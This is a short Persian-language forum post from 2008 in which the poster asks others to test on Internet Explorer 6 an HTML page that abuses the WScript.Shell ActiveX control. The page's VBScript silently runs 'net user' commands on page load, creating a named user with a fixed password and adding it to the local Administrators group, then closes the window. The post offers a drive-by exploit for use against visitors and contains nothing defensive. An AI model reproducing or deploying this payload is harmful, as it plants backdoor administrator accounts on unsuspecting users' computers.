۲۶-خرداد-۱۳۸۷, ۰۰:۳۱:۵۹
با سلام
کسی میتونه این کد رو امتحان کنه ببینه رو ie6 هنوز کار میکنه یا نه؟
(متاسفانه من ie7 دارم )این یه activex برای ساخت user هست
کسی میتونه این کد رو امتحان کنه ببینه رو ie6 هنوز کار میکنه یا نه؟
(متاسفانه من ie7 دارم )این یه activex برای ساخت user هست
کد:
<html>
<title>[this is funny for u LVP]</title>
<object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B align="top"></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user stillbirth enigmattl /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators stillbirth /add",0)
window.close
</script>
</html>